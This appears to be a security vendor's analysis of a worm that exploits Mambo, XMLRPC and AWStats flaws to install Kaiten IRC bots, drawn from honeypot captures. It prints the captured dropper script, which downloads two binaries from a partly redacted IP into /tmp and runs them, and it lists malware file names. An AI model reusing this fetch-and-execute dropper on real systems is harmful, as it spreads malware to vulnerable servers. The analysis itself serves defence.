The IRC community has been aware of several networks with large Kaiten botnets. According to Chief of Security of Nightstar IRC network, one network has greater than one thousand (1000) bots sitting in a single channel.
“The worm compromises web servers via one of several exploits, and then attempts to download a shell script, which in turn downloads a copy of the worm and a Kaiten bot, and executes them.”, the Chief of Security explained.
This is just what we have received in our honeypots nodes.
For this particularincident, the packet that we sniffed attempts to exploit a known Mambo vulnerability to execute a cgi script (PHP_DEFTOOL.A) which in turn, downloads and executes a shell script named “micu” to the affected system.
This is what the shell script contains.
#!/bin/bash
cd /tmp
wget XXX.XXX.48.69/mare
chmod 744 mare
./mare
wget XXX.XXX.48.69/ro
chmod 744 ro
./ro
(The first two octets are intentionally changed to ‘XXX’, to avoid spreading the malicious links!)
When this script is executed it will download the two ELF binaries, change the attributes to executable, and executes the files to the compromised system.
The file ‘ro’ is already detected by Trend Micro as ELF_KAITEN.M, which is the copy of the bot being distributed. The file ‘mare’ on the other hand, is the worm component that spreads ‘micu’ on the vulnerable web servers with Mambo application installed. The cycle keeps on going again and again.
“Shell scripts have been seen with names of ‘criman’, ‘nikons’, and ‘listen’. The worm has been seen with names of ‘pini’, ‘pin’, ‘lordnikon’, and ‘d’. The kaiten executables have been seen with names of ‘a’, ‘f’, ‘g’, ‘w’, ‘ko’, and ‘qs’.”, the Chief of Security added.
The vulnerabilities that this worm targets in order to propagate copy of itself and the bot are all web server vulnerabilities such as PHP XMLRPC Exploit, Mambo “mosConfig_absolute_path” Vulnerability, and AWStats “configdir” Remote Command Execution Exploit.
As noticed in the list of names the Chief of Security mentioned, the packets that we received in this particular incident might just be generated by the newly compiled copy of the worm because our shell script has the name ‘micu’, the copy of bot has the name ‘ro’, and the copy of the worm has the name ‘mare’.
The lists will continue to be populated as long as there are vulnerable or unpatched web servers. So as to avoid or to minimize these kinds of incidents, regular patching or updating of softwares should be done.